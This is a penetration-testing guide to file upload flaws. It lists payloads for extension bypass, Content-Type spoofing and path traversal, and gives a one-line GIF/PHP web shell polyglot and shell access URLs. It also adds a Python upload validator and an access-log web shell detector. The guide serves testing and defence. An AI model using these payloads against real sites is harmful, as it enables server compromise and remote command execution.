Comprehensive guide to testing file upload functionality for web shell uploads, extension bypasses, content-type manipulation, and path traversal.
Find all file upload endpoints: profile picture uploads, document submission forms, import features, and API endpoints accepting file uploads. Note the allowed file types and size limits shown in the UI.
test.jpg (legitimate upload)
test.txt (test accepted types)
Try uploading executable file extensions. If blocked, test bypass techniques: double extensions, null bytes, case variations, and alternative executable extensions.
shell.php
shell.php.jpg
shell.pHp
shell.php%00.jpg
shell.phtml
shell.php5
shell.shtml
Intercept the upload request and change the Content-Type header. Some applications validate only the MIME type, not the actual file content or extension.
Content-Type: image/jpeg (with PHP content)
Content-Type: image/png (with JSP content)
Content-Type: application/octet-stream
Add valid file headers (magic bytes) to malicious files, or create polyglot files that are valid images AND executable scripts. This bypasses content-based validation that only inspects the first bytes of the file rather than scanning the whole content.
GIF89a; <?php system($_GET["cmd"]); ?>
\xFF\xD8\xFF\xE0 + PHP code (JPEG header)
%PDF-1.5 + embedded JavaScript
Attempt to control where the file is stored by including directory traversal sequences in the filename. This can overwrite critical files or place the shell in a web-accessible directory.
../../../var/www/html/shell.php
..\..\..\inetpub\wwwroot\shell.aspx
file.php%2f..%2f..%2fshell.php
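The checks that defeat the extension, Content-Type, magic-byte and filename-traversal tricks listed above can be combined in one server-side validator. The following is an added example written for this page (not code from the original cheat sheet or any particular framework): it rejects double extensions, null bytes and case variants through a single-extension allow-list, cross-checks the declared Content-Type and magic bytes against that extension, scans the body for script markers to catch polyglots, refuses any filename carrying separators or `..`, and stores the file under a server-generated random name so nothing client-controlled reaches the filesystem. The allow-list, marker list and stem regex are assumptions chosen for the example.

```python
"""Hardened upload validation (added example; the allow-list, marker list
and naming policy below are assumptions, not values from the page)."""
import re
import secrets

# Allow-list keyed by the lowercased final extension:
# extension -> (accepted Content-Type values, magic-byte prefixes).
ALLOWED = {
    "jpg":  ({"image/jpeg"}, (b"\xff\xd8\xff",)),
    "jpeg": ({"image/jpeg"}, (b"\xff\xd8\xff",)),
    "png":  ({"image/png"}, (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ({"image/gif"}, (b"GIF87a", b"GIF89a")),
    "pdf":  ({"application/pdf"}, (b"%PDF-",)),
    "txt":  ({"text/plain"}, ()),   # plain text has no magic bytes
}

# Lowercased byte sequences that indicate script content riding inside a
# file whose header says "image" or "document" (the polyglot case).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script", b"/javascript")

# The part of the name before the dot: letters, digits, "_" and "-" only.
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class UploadRejected(ValueError):
    """Raised with a reason string when an upload fails any check."""


def safe_extension(filename):
    """Return the lowercased extension of a client-supplied filename or
    raise UploadRejected. Each branch answers one bypass family."""
    if "/" in filename or "\\" in filename or ".." in filename:
        raise UploadRejected("path separator or traversal in filename")
    if "\x00" in filename or "%00" in filename:
        raise UploadRejected("null byte in filename")
    if "%" in filename:
        raise UploadRejected("percent-encoding in filename")
    parts = filename.split(".")
    if len(parts) != 2:
        # Covers "shell" (no extension) and "shell.php.jpg" (double).
        raise UploadRejected("expected exactly one extension")
    stem, ext = parts
    if not STEM_RE.match(stem):
        raise UploadRejected("disallowed characters in filename")
    ext = ext.lower()            # shell.pHp and shell.php are the same thing
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} not on the allow-list")
    return ext


def validate_upload(filename, content_type, data):
    """Validate one upload. Returns the server-chosen storage name on
    success and raises UploadRejected otherwise."""
    ext = safe_extension(filename)
    mimes, magics = ALLOWED[ext]
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared not in mimes:
        raise UploadRejected(f"Content-Type {declared!r} does not match .{ext}")
    # Magic bytes must agree with the extension, not just with *some* type.
    if magics and not data.startswith(magics):
        raise UploadRejected("magic bytes do not match the extension")
    # A valid header is not enough: scan the body for embedded script.
    head = data[:65536].lower()
    for marker in SCRIPT_MARKERS:
        if marker in head:
            raise UploadRejected("script marker found inside file")
    # Random server-chosen name: the client never controls the stored path.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename, content_type, data):
    """Boolean wrapper used for quick checks and tests."""
    try:
        validate_upload(filename, content_type, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate JPEG, one GIF/PHP polyglot.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32
    print(validate_upload("test.jpg", "image/jpeg", jpeg))
    print(is_accepted("avatar.gif", "image/gif", b"GIF89a; <?php echo 1; ?>"))
```

The validator deliberately does not try to "clean" a suspicious name; every failed check rejects the upload outright, and the accepted file is written under a name the server generated, so traversal sequences, encoded separators and alternative extensions never influence where or how the file is stored. Serving the stored files from a directory with script execution disabled is the complementary server-side control.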
Find the URL where uploaded files are served. Check the response for file paths, try common upload directories, and test if the file executes as code when accessed directly.
/uploads/shell.php?cmd=id
/media/shell.php
/static/uploads/shell.phtml
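From the defender's side, requests like the ones above are visible in the web server access log: a path under an upload directory ending in a script extension, especially one answered with 200 and carrying a command-style query parameter, is a strong indicator that an uploaded file is being executed. The following detection logic is an added example (not code from the original page); the upload prefixes, extension set, parameter names and the combined-format log lines are all constructed for illustration.

```python
"""Flag access-log requests that fetch script files from upload
directories (added example; prefixes, extensions and log lines are
constructed assumptions, not data from the page)."""
import re

# Directories where the hypothetical application serves user uploads.
UPLOAD_PREFIXES = ("/uploads/", "/media/", "/static/uploads/")

# Extensions a web server may hand to an interpreter; none belong under
# an upload directory.
SCRIPT_EXTS = {"php", "php5", "phtml", "shtml", "asp", "aspx", "jsp"}

# Apache/nginx "combined" log format, enough fields for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters that typically carry a command to a web shell.
CMD_PARAM_RE = re.compile(r"(?:^|&)(?:cmd|exec|command)=", re.IGNORECASE)

# Constructed sample log: two benign requests, two suspicious ones, one PDF.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /uploads/avatar_1234.jpg HTTP/1.1" 200 51234
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /profile/upload HTTP/1.1" 302 0
198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 87
198.51.100.23 - - [10/Oct/2023:13:56:05 +0000] "GET /static/uploads/shell.phtml HTTP/1.1" 200 87
198.51.100.23 - - [10/Oct/2023:13:56:09 +0000] "GET /media/report.pdf HTTP/1.1" 200 20480
"""


def analyse_line(line):
    """Return a finding dict for one suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.startswith(UPLOAD_PREFIXES):
        return None
    name = path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    reasons = []
    if ext in SCRIPT_EXTS:
        reasons.append(f"script extension .{ext} under upload directory")
    if CMD_PARAM_RE.search(query):
        reasons.append("command-style query parameter")
    if not reasons:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "path": path,
        "status": status,
        # A 200 means the server served (and likely executed) the file.
        "executed": status == 200 and ext in SCRIPT_EXTS,
        "reasons": reasons,
    }


def scan(lines):
    """Run analyse_line over an iterable of log lines, keeping findings."""
    return [f for f in map(analyse_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

Run against the constructed sample, `scan` reports the two requests for `shell.php` and `shell.phtml` and ignores the image, the PDF and the upload POST itself. In practice the same check pairs with a periodic scan of the upload directory for files whose magic bytes or extension disagree with what the application allows.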